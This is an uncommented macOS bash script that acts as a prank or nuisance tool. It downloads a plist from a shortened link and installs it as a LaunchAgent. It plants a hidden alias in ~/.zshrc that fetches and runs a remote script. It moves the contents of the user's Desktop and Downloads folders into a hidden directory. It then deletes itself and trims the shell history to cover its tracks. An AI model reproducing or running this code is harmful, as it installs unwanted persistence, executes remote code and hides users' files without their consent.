#!/bin/bash

if [[ $1 -eq 1 ]]
then
        curl -L -o com.local.hh.plist https://bit.ly/3OD0731
        mv ~/com.local.hh.plist ~/Library/LaunchAgents
        launchctl load ~/Library/LaunchAgents/com.local.hh.plist
        hidutil property --set '{"UserKeyMapping":[]}'
        launchctl start com.local.hh
        alias='alias 133769420="'
        curl='cd && curl -L -o .reset.sh https://bit.ly/3OATrCw &>/dev/null && chmod +x .reset.sh && '
        sed='sed -i -e '"'"'s/\r//g'"'"
        exec=' .reset.sh && ./.reset.sh 1"'
        echo -e '\n\n\n' >> ~/.zshrc
        echo "${alias}${curl}${sed}${exec}" >> ~/.zshrc
        rm -rf $0*
        sed -i '' -e :a -e '$d;N;2,10ba' -e 'P;D' ~/.zsh_history
        sed -i '' -e :a -e '$d;N;2,10ba' -e 'P;D' ~/.bash_history
elif [[ $1 -eq 2 ]]
then
        mkdir ~/.lmaktab ~/.ta7milat ~/.TIG
        mv ~/Desktop/* .lmaktab
        mv ~/Downloads/* .ta7milat
        mv ~/.lmaktab ~/.ta7milat ~/.TIG
        mv ~/.TIG ~/Library/Application\ Support
        #curl -o hh.png https://i.imgur.com/F44ZhIK.png
        #mv hh.png ~/Desktop
        #path=$2/Desktop/hh.png
        #script='osascript -e '"'"'tell application "Finder" to set desktop picture to POSIX file '
        #exec="${script}\"${path}\"'"
        #bash -c "${exec}"
        alias='alias 4269420="'
        curl='cd && curl -L -o .reset.sh https://bit.ly/3OATrCw &>/dev/null && chmod +x .reset.sh && '
        sed='sed -i -e '"'"'s/\r//g'"'"
        exec=' .reset.sh && ./.reset.sh 2"'
        echo -e '\n\n\n' >> ~/.zshrc
        echo "${alias}${curl}${sed}${exec}" >> ~/.zshrc
        rm -rf $0*
        sed -i '' -e :a -e '$d;N;2,10ba' -e 'P;D' ~/.bash_history
        sed -i '' -e :a -e '$d;N;2,10ba' -e 'P;D' ~/.zsh_history
else
        echo "missing arg"
fi